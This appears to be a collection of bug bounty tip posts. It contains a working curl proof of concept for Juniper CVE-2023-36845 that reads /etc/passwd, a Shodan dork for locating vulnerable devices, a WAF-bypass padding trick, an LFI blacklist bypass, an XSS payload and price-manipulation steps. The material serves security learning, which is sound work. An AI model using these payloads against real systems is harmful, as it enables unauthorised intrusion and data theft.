Bug bounty Tips

Join my WhatsApp channel on hacking and tech tips https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A

Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845 Nearly 14,000 Juniper devices are affected, as a search on Shodan shows: Dork : title:"Juniper" http.favicon.hash:2141724739 Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0' Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei: https://lnkd.in/gEQrmXev For more information: https://lnkd.in/gRP3uXTm #hacker_bano_chutiya_nhe

Bug bounty Guide 2023 | Quick Start Your Bug Bounty Journey https://youtu.be/Z1VFoBzJZuA

#bugbountytips Having trouble with a WAF? For POST/PUT/PATCH requests, try inserting a useless parameter with between 8KB to 10MB of random data BEFORE your malicious payload. Many WAFs stop processing after X payload characters, allowing anything AFTER that through the WAF use this website frequently to generate the easy to insert payloads (copy and paste): https://onlinefiletools.com/generate-random-text-file Credit : ZwinK

OS Command Injection 🕸🔖 Allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application leads to fully compromising the application and all its data. Thread 🧵 : 👇 https://twitter.com/Aacle_/status/1629700693530640385?s=20

Price Manipulation Method If the product price parameter cannot be changed, change the quantity of products. items[1][quantity]=1 --> 234 € items[1][quantity]=0.1 --> 23.4 € #bugbountytips #bugbountytip #bugbounty #cybersecurity #ethicalhacking

check out this a series of SSRF on exploring canvas and accessing internal pages, https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-ssrf-vulnerabilities-and-their-impact/exploring-the-canvas-common-exploits-for-accessing-internal-pages

Check out this top youtube channels to learn hacking https://book.cipherops.tech/bug-bounty-notes/overview/lets-start/resources/stay-one-step-ahead-of-hackers-discover-the-ultimate-cybersecurity-youtube-channels

Recon is the key and below is a good tip created for you : 1 - Collect your target IPs range 2- Go to Censys search engine 3 - Run : ip=Target_range/XX 4 - Looking for a specific status code run this: ip=Target_range/XX and services.http.response.status_code=200

Browser-Based application LFI file:///etc/passwd blacklisted? Use "view-source:file:///etc/passwd" "view-source" is often forgotten by developers in blacklists. #BugBounty #BugBountyTip #BugBountyTips

Tips 🌿🌻🍂 whenever you saw any email input field! 70% bug hunters don't try XSS there as compared to name field. always try this in email input field! "<img/src/onerror=alert(0)"@xss.com This don't work every time but give it a try found 2 XSS today using this! Tips 🌿🌻🍂 👆

To find information disclosure vulnerabilities change the headers - Change the Accept header to: - Also trying sending null byte like GET /%00 If error handling is not done properly, reveals server version information, stack and route information #bugbounty #bugbountytip

i am working on collection on series of ssrf vulnerability exploits maybe i will release it soon with update

Check out this SSRF Blog which i took it from hackerone report and also did some little changes adding tips and all, i hope u guys like the update. https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-ssrf-vulnerabilities-and-their-impact

200 members 🥳🥳❤️‍🩹 thanks every one

Learn: · Web Application Security · Vulnerability Analysis · Reconnaissance Techniques Think: · Like an Attacker · Outside the Box · Security First Create: · Detailed Reports · Proof-of-Concept Exploits · A Safer Cyberspace Watch how exciting your bug bounty hunting journey becomes. 🐛💻🔒 #BugBountyHunter